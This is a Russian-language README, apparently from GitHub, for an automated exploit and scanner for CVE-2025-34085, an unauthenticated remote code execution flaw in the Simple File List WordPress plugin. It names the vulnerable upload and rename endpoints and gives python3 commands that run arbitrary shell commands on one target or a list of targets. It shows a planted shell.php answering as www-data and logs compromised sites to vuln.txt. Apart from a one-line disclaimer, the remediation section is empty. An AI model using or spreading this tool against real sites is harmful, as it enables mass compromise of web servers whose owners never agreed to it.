
Эксплойт удаленного выполнения кода без аутентификации в Simple File List для WordPress
Автоматизированный эксплойт и сканер для CVE-2025-34085 — критической уязвимости в плагине WordPress Simple File List, позволяющей неаутентифицированное удаленное выполнение кода через загрузку и переименование произвольных файлов.
Неаутентифицированная загрузка файла
/wp-content/plugins/simple-file-list/ee-upload-engine.phpПереименование в PHP-расширение
.php или подобное расширение через:/wp-content/plugins/simple-file-list/ee-file-engine.phpВыполнение полезной нагрузки
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
Поместите URL-адреса целей в targets.txt (по одному на строку), затем выполните:
python3 CVE-2025-34085.py --cmd "whoami"
| Аргумент | Описание |
|---|---|
-u | URL цели (например, http://example.com) |
--cmd | Команда для выполнения на удаленном шелле (по умолчанию: id) |
--inline | Использовать встроенную полезную нагрузку (без параметра ?cmd=) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Успешно атакованные цели сохраняются в vuln.txt.
CVE-2025-34085.py — Основной скрипт эксплойтаtargets.txt — (Опционально) Список целевых доменовvuln.txt — Журнал успешных эксплойтовАдминистраторам следует:
Этот проект предназначен только для образовательных целей и авторизованного тестирования. Автор не несет ответственности за неправомерное использование или ущерб, причиненный данным инструментом.
Этот проект лицензирован по лицензии MIT. 📄 Просмотреть полный текст лицензии
0xgh057r3c0n 🔗 GitHub: github.com/0xgh057r3c0n